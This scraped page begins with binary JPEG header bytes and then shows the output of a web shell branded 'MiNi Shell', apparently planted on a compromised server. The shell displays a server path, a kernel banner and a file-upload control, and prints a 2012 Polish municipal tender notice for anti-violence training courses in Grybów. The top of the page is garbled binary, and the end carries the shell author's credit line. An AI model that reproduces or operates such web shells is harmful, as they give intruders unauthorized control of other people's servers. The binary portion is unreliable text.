JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121121/462396-N-2012.html

<p class="kh_header"><b>Grybów: organizacja i realizacja szkoleń dla 15 osób w ramach projektu systemowego pn. Nowe perspektywy - nowe szansewspółfinansowanego w ramach Poddziałania 7.1.1 PO KL</b><br>
<b>Numer ogłoszenia: 462396 - 2012; data zamieszczenia: 21.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek  Pomocy Społecznej w Grybowie , ul. Jakubowskiego 33, 33-330 Grybów, woj. małopolskie, tel. 18 448 42 46, faks 18 448 42 46.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja i realizacja szkoleń dla 15 osób w ramach projektu systemowego pn. Nowe perspektywy - nowe szansewspółfinansowanego w ramach Poddziałania 7.1.1 PO KL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pomoc i działania prewencyjne dla osób i rodzin dotkniętych lub zagrożonych zjawiskiem przemocy dla grupy 15 osób minimum trzy instrumenty aktywnej integracji, a w szczególności wymienione niżej przedmioty: Moduł I: Trening modelowych zachowań reagowania ofiary na sytuacje i momenty kryzysowe, a w tym: Prawne sposoby reagowania na przemoc fizyczną - sesja grupowa z prawnikiem (8godz), Prawne sposoby reagowania na przemoc fizyczną - konsultacje dot. problemów indywidualnych - sesja grupowa z prawnikiem (30 godz.2 godz na os, tutaj wymagane trzech trenerów w jeden dzień:Trener 1: 5 os., 2 godz. na os.,Trener 2: 5 os., 2 godz. na os.,Trener 3: 5 os., 2 godz. na os.), Trening zachowań w sytuacjach zagrożenia Trening zachowań w sytuacjach zagrożenia, kompletowanie dokumentacji do spraw sądowych - zajęcia z detektywem (8godz.), Psychologiczne sposoby radzenia sobie z efektami przemocy fizycznej - zajęcia z psychologiem (8godz.). Moduł II: Zajęcia ruchowe - działanie przeciwko przemocy fizycznej a w tym; Aerobik - zajęcia z instruktorem aerobiku (15 godz.), Samoobrona - trener lub doświadczony w tym zakresie ekspert (15 godz.) wazne:zajęcia trwają równolegle trzy godz. lekcyjne (6 jednostek łącznie podczas jednego spotkania) - BO wybierają odpowiednio grupę ćwiczącą, na którą chcą uczestniczyć. Moduł III:Zajęcia terapeutyczne - działanie przeciwko przemocy psychicznej a w tym;Psychologiczne sposoby radzenia sobie z przemocą psychiczną - zajęcia z psychologiem (8godz.), Środki ochrony prawnej w sytuacjach przemocy psychicznej - zajęcia z policjantem (6godz.), Indywidualne konsultacje z psychologiem (30 godz. tj. 2 godz na os, Tutaj wymagane trzech trenerów w jeden dzień:Trener 1: 5 os., 2 godz. na os.,Trener 2: 5 os., 2 godz. na os.,Trener 3: 5 os., 2 godz.  na os), Komunikacja i elementy asertywności w sytuacjach agresji psychicznej - zajęcia z doświadczonym ekspertem (6godz.), Trening umiejętności odstresowujących - warsztaty (8godz.), Rozwój zdolności manualnych - zajęcia ceramiczne sposobem walki ze stresem - ekspert w dziedzinie wyrobów naczyń ceramicznych (6 godz.), Rozwój zdolności manualnych - zajęcia florystyczne z elementami zielarstwa sposobem walki ze stresem - ekspert w dziedzinie kwiaciarstwa, zielarstwa (6godz.), Wybrane sposoby walki ze stresem - wybrane przez BO sposoby spędzania czasu wolnego (12 godz.Tutaj wymagane dwóch trenerów w jeden dzień:Trener 1: gr. 7 os., 6 godz.na gr.,Trener 2: gr. 8 os., 6 godz.na gr.) wazne:należy zagwarantować 15 UP odpowiednie przyrządy i materiały wykorzystywane w trakcie zajęć do prowadzenia wskazanych przedmiotów. Moduł IV:Zajęcia z zakresu poszukiwania pracy - działanie przeciwko przemocy ekonomicznej a w tym:Przygotowanie dokumentów aplikacyjnych (CV, podanie o pracę, list motywacyjny itd.) -ekspert lub doradca zawodowy (6godz.), Aktywne sposoby poszukiwania pracy -ekspert lub doradca zawodowy (6godz.), Trening rozmów kwalifikacyjnych -ekspert lub doradca zawodowy (6godz.), Planowanie indywidualnej ścieżki rozwoju zawodowego - sesja grupowa - doradca zawodowy (6godz),  Planowanie indywidualnej ścieżki rozwoju zawodowego - konsultacje indywidualne - doradca zawodowy (30 godz. tj 2 godz na os, Tutaj wymagane trzech trenerów w jeden dzień:Trener 1: 5 os., 2 godz. na os.,Trener 2: 5 os., 2 godz. na os.,Trener 3: 5 os., 2 godz. na os.). Uszczegółowione info na ten temat zawiera załącznik nr 1 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dot</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-Wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej- art. 20 ust.1ustawy z  dnia 20.04.2004r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z  2008r. Nr  69, poz. 415 z późn. zm
-Aktualny wpis do Ewidencji Działalności Gospodarczej lub Krajowy Rejestr Sądowy
-Złoży podpisany Załącznik nr 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-W okresie od 2008 do 2012 roku, wykonał należycie co najmniej po 3 szkolenia rocznie przeprowadzonych w ramach Poddziałania 7.1.1 PO KL dla ośrodków pomocy społecznej (przedmiot szkoleń dowolny);
-Zrealizował minimum 300 godz. szkoleniowych z zakresu doradztwa zawodowego, poszukiwania pracy - szkolenia w ramach PO KL;
-Zrealizował minimum 30 projektów/szkoleń z zakresu doradztwa zawodowego, poszukiwania pracy - szkolenia w ramach PO KL;
-Zrealizował minimum 2 projekty/szkolenia z zakresu specjalistycznych zajęć (doradztwo, wykłady) dla osób dotkniętych przemocą - szkolenia w ramach PO KL;
-Zrealizował minimum 150 godz. szkoleniowych z zakresu specjalistycznych zajęć (doradztwo, wykłady) dla osób dotkniętych przemocą - szkolenia w ramach PO KL;
-Zrealizował łącznie minimum 100 godz. szkoleniowych z zakresu specjalistycznych zajęć prowadzonych przez: prawnika, detektywa, policjanta - szkolenia w ramach PO KL (prawnik, detektyw, policjant - musieli realizować szkolenia, nie może być sytuacji w której np.: tylko prawnik zrealizował zakładaną minimalną liczbę godz.);
-Zrealizował łącznie minimum 6 projektów/szkoleń z zakresu specjalistycznych zajęć, które były prowadzone przez: prawnika, detektywa, policjanta - szkolenia w ramach PO KL (prawnik, detektyw, policjant - musieli realizować szkolenia, nie może być sytuacji w której np.: tylko prawnik zrealizował zakładaną minimalną liczbę projektów);
-Zrealizował minimum 300 godz. szkoleniowych z zakresu samoobrony i aerobiku - szkolenia w ramach PO KL (samoobrona i aerobik musiały być realizowane, nie może być sytuacji w której np.: tylko aerobik zrealizował zakładaną minimalną liczbę godz.);
-Zrealizował minimum 6 projektów/szkoleń z zakresu samoobrony i aerobiku - szkolenia w ramach PO KL (samoobrona i aerobik musiały być realizowane, nie może być sytuacji w której np.: tylko aerobik zrealizował zakładaną minimalną liczbę szkoleń/projektów);
-Posiada doświadczenie w zakresie szkoleń z zakresu samoobrony dla kobiet dotkniętych przemocą - szkolenia w ramach PO KL;
-Posiada doświadczenie w realizacji minimum 150 godz. szkoleniowych z zakresu szkoleń i doradztwa psychologicznego dot. zjawisk przemocy - szkolenia w ramach PO KL;
-Posiada doświadczenie w realizacji minimum 2 projektów/szkoleń z zakresu szkoleń i doradztwa psychologicznego dot. zjawisk przemocy - szkolenia w ramach PO KL;
-Posiada doświadczenie w realizacji minimum 150 godz. szkoleniowych z zakresu alternatywnych form spędzania czasu wolnego - szkolenia w ramach PO KL;
-Posiada doświadczenie w realizacji minimum 3 projektów/szkoleń z zakresu alternatywnych form spędzania czasu wolnego - szkolenia w ramach PO KL;
-Posiada doświadczenie w realizacji szkoleń/projektów z zakresu rozwoju zdolności manualnych  - szkolenia w ramach PO KL.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest zabezpieczenie przez Wykonawcę na czas realizacji szkolenia salą szkoleniową na terenie Gminy Grybów dostosowaną do liczby 15 osób, odpowiednio wyposażona w miejsca siedzące dla 15 uczestników oraz posiadającą warunki do zajęć ruchowych.
Warunek ten zostanie spełniony jeśli wykonawca przedstawi dokument potwierdzający dysponowanie salą szkoleniową posiadającą również warunki do prowadzenia zajęć ruchowych, sygnowany przez właściciela sali bądź też podmiotu, który salą tą w świetle prawa zarządza.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dot</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dot</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/root_jednostki/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/root_jednostki/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2012 godzina 08:10, miejsce: Gminny Ośrodek Pomocy Społecznej w Grybowie
33-330 Grybów, ul. Jakubowskiego 33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 31.12.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z budżetu UE, w ramach EFS, w ramach Poddziałania 7.1.1 PO KL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com